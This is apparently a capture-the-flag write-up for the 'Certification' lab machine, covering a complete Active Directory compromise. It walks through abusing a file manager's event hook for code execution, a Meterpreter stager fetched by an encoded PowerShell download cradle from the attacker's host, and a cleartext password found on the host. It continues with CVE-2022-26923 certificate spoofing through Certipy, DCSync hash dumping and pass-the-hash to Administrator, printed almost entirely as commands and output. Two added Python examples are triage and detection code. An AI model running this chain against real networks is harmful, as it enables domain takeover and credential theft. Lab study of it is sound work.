Certification

A Certification Authority has declined our requests to access their data in order to identify a well known APT group. Unfortunately we do not have the jurisdiction to force them to cooperate. For this reason you are tasked with hacking their infrastructure in order to gather information.

Enumeration:

sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp  open  http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57496/tcp open  msrpc         Microsoft Windows RPC
59262/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
64924/tcp open  msrpc         Microsoft Windows RPC

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126

SMB         10.129.230.126  445    CFN-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)

Visit http://10.129.230.126:8000/ and log in with the default credentials admin:admin. http://10.129.230.126:8000/settings/global allows you to define commands that are triggered by different events, e.g., Before Rename. Whatever is entered there is executed on the server when the event fires, so this is a command-execution primitive without any exploit.

Preparation:

Generate a Meterpreter stager in PowerShell format and write it to the directory that will be served over HTTP:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1 -o Public/bp-simple-runim64.ps1

A matching multi/handler (payload windows/x64/meterpreter/reverse_https, LPORT 443) has to be listening before the hook fires.

Build the argument for powershell.exe -enc. PowerShell expects the command as UTF-16LE and then base64; a plain UTF-8 base64 string would not decode on the target. The resulting command line is what goes into the Before Rename field:

echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA

Serve the stager from the Public directory:

cd Public/
sudo python3 -m http.server 80

Now trigger command execution by renaming a folder in http://10.129.230.126:8000/files/. The hook runs the cradle, the cradle pulls the stager from the HTTP server, and a Meterpreter session arrives on the handler.

meterpreter > cat user.txt

HTB{Abu51ng_F34tur3s_4r3_fun}

Nice. Next, look for stored credentials on the host; applist.ps1 contains a cleartext domain password:

meterpreter > cat applist.ps1

$user = "daniel.morgan"
$pass = "FDOnolk(naws)"

The challenge name hints at AD CS. The relevant vulnerability, recent at the time, is CVE-2022-26923 ("Certifried"), described here:

https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4

Enumeration with Certipy, authenticating as daniel.morgan with the password from applist.ps1 (entered at the prompt):

certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'

...
Template Name                       : Machine
Certificate Authorities             : certification-CFN-SVRDC01-CA
Enabled                             : True
Client Authentication               : True
Enrollee Supplies Subject           : False
Certificate Name Flag               : SubjectRequireDnsAsCn
                                      SubjectAltRequireDns
Enrollment Flag                     : AutoEnrollment
Extended Key Usage                  : Client Authentication
                                      Server Authentication
Requires Manager Approval           : False
Application Policies                : 
Authorized Signatures Required      : 0
Validity Period                     : 1 year
Renewal Period                      : 6 weeks
Permissions
  Enrollment Permissions
    Enrollment Rights               : CERTIFICATION.HTB\Domain Admins
                                      CERTIFICATION.HTB\Domain Computers
                                      CERTIFICATION.HTB\Enterprise Admins
...
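An added Python example, not from the write-up and not part of Certipy, that turns the triage of the output above into a function: the Machine template's properties are transcribed from the Certipy output into a dict, and certifried_blockers lists whichever precondition rules the template out (an empty list means it is a candidate). The set of groups a freshly created machine account is assumed to fall under is my assumption. These are necessary conditions read off the template only; whether the DC and CA are actually unpatched is proven only by the request and authentication succeeding.

```python
# Certipy "find" output for the Machine template, transcribed from the write-up.
MACHINE_TEMPLATE = {
    "name": "Machine",
    "enabled": True,
    "client_authentication": True,
    "enrollee_supplies_subject": False,
    "certificate_name_flags": {"SubjectRequireDnsAsCn", "SubjectAltRequireDns"},
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": {
        "CERTIFICATION.HTB\\Domain Admins",
        "CERTIFICATION.HTB\\Domain Computers",
        "CERTIFICATION.HTB\\Enterprise Admins",
    },
}

# Assumption: groups whose enrollment right a newly created machine account can exercise.
LOW_PRIV_MACHINE_PRINCIPALS = {"domain computers", "authenticated users", "everyone"}


def certifried_blockers(template: dict) -> list:
    """Return the reasons the template is NOT usable for the Certifried path.

    The checks mirror the CVE-2022-26923 write-up: a certificate usable for Kerberos
    client authentication, whose SAN the CA builds from the enrollee's dNSHostName,
    issued without human approval to a principal a throwaway machine account holds.
    """
    blockers = []
    if not template["enabled"]:
        blockers.append("template not enabled")
    if not template["client_authentication"]:
        blockers.append("no Client Authentication EKU, certificate is useless for PKINIT")
    if "SubjectAltRequireDns" not in template["certificate_name_flags"]:
        blockers.append("SAN is not built from dNSHostName, nothing to spoof")
    if template["enrollee_supplies_subject"]:
        blockers.append("enrollee supplies the subject (that is ESC1, a different path)")
    if template["requires_manager_approval"]:
        blockers.append("manager approval required")
    if template["authorized_signatures_required"] > 0:
        blockers.append("enrollment agent signature required")
    # Strip the DOMAIN\ prefix and compare group names case-insensitively.
    rights = {r.split("\\", 1)[-1].lower() for r in template["enrollment_rights"]}
    if not rights & LOW_PRIV_MACHINE_PRINCIPALS:
        blockers.append("no enrollment right for a group a new machine account belongs to")
    return blockers


if __name__ == "__main__":
    problems = certifried_blockers(MACHINE_TEMPLATE)
    print("candidate" if not problems else "; ".join(problems))
```

Running the same function over every template in a Certipy export is the quick way to see which templates, besides the stock Machine one, would accept a spoofed dNSHostName.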

Looks good! Domain Computers, i.e. every machine account, can enrol in the Machine template, the template carries the Client Authentication EKU, and the CA builds the subject and SAN from the enrollee's dNSHostName (SubjectRequireDnsAsCn / SubjectAltRequireDns), with no manager approval or signatures required. Exploitation:

sudo nano /etc/hosts

10.129.224.146  CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb

(The target's IP address changed after a reboot of the lab instance.)

Create a new machine account wtf$ and use the -dns flag to set its dNSHostName to the domain controller's FQDN, which is the CVE-2022-26923 abuse: the CA will later copy that name into the certificate. Note that Certipy only sets the short-name SPNs (HOST/wtf, RestrictedKrbHost/wtf); an SPN containing the DC's FQDN would collide with the DC's own SPNs and the update would be rejected. Creating the account relies on daniel.morgan still being allowed to add computer objects (ms-DS-MachineAccountQuota, 10 by default).

certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)

Password:
[*] Creating new account:
    sAMAccountName                      : wtf$
    unicodePwd                          : J6AeabTzuSGNFElP
    userAccountControl                  : 4096
    servicePrincipalName                : HOST/wtf
                                          RestrictedKrbHost/wtf
    dnsHostName                         : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'
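The account creation above is exactly what a defender should be looking for. As an added example, not from the write-up, the following Python checks an export of computer objects for dNSHostName values that do not match the object's own name and for one FQDN claimed by more than one object. The account names are taken from the NTDS dump later in the write-up and wtf$'s dNSHostName is the value Certipy set; the other dNSHostName values are constructed.

```python
from collections import defaultdict

DOMAIN = "certification.htb"

# Computer objects as an LDAP export would present them (constructed sample data;
# account names from the NTDS dump, wtf$'s dNSHostName from the Certipy output).
COMPUTERS = [
    {"sAMAccountName": "CFN-SVRDC01$", "dNSHostName": "CFN-SVRDC01.certification.htb"},
    {"sAMAccountName": "CFN-WKS001$", "dNSHostName": "cfn-wks001.certification.htb"},
    {"sAMAccountName": "SETUPMACHINE$", "dNSHostName": None},
    {"sAMAccountName": "wtf$", "dNSHostName": "CFN-SVRDC01.certification.htb"},
]


def expected_dns_host_name(sam: str, domain: str = DOMAIN) -> str:
    """The dNSHostName a computer object normally carries: its name plus the domain suffix."""
    return f"{sam.rstrip('$')}.{domain}".lower()


def find_dns_host_name_abuse(computers, domain=DOMAIN):
    """Flag computer objects whose dNSHostName does not match their own name, and
    dNSHostName values claimed by several objects (the Certifried signature: a
    throwaway machine account carrying a domain controller's FQDN).

    Returns (mismatches, collisions): mismatches is a list of (sAMAccountName, dNSHostName),
    collisions maps a lowercased dNSHostName to the sorted accounts claiming it.
    """
    mismatches = []
    claims = defaultdict(list)
    for obj in computers:
        sam, dns = obj["sAMAccountName"], obj["dNSHostName"]
        if not dns:
            continue  # nothing to compare; the attribute is simply unset
        dns_l = dns.lower()
        claims[dns_l].append(sam)
        if dns_l != expected_dns_host_name(sam, domain):
            mismatches.append((sam, dns))
    collisions = {d: sorted(a) for d, a in claims.items() if len(a) > 1}
    return mismatches, collisions


if __name__ == "__main__":
    mism, coll = find_dns_host_name_abuse(COMPUTERS)
    for sam, dns in mism:
        print(f"mismatch: {sam} claims {dns}")
    for dns, accounts in coll.items():
        print(f"collision: {dns} claimed by {', '.join(accounts)}")
```

Mismatches alone are only leads (renamed machines and cluster objects produce them legitimately); a mismatch that also collides with a domain controller's FQDN, as wtf$ does here, is the case to act on.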

Now request a certificate. The only difference to the blog post is the -dynamic-endpoint flag (it did not work without it).

certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'

Use the certificate to authenticate as the domain controller's machine account via PKINIT and retrieve its NT hash; Certipy obtains a TGT with the certificate and then recovers the hash through Kerberos U2U. The "Certificate object SID is None" line above is consistent with an unpatched CA: the fix for CVE-2022-26923 adds a SID-bearing extension to issued certificates so the DC no longer has to map on the DNS name alone.

certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a

DCSync with the DC's machine account, which holds the replication rights DRSUAPI requires:

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds

SMB         10.129.224.146  445    CFN-SVRDC01      [+] Dumping the NTDS, this could take a while so go grab a redbull...

SMB         10.129.224.146  445    CFN-SVRDC01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB         10.129.224.146  445    CFN-SVRDC01      Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.224.146  445    CFN-SVRDC01      krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB         10.129.224.146  445    CFN-SVRDC01      daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB         10.129.224.146  445    CFN-SVRDC01      SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB         10.129.224.146  445    CFN-SVRDC01      wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::

Collect the root flag by passing the Administrator NT hash over SMB:

impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb

# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt

HTB{c3rtif1c4t35_c4n_8e_f4k3d}

Excellent.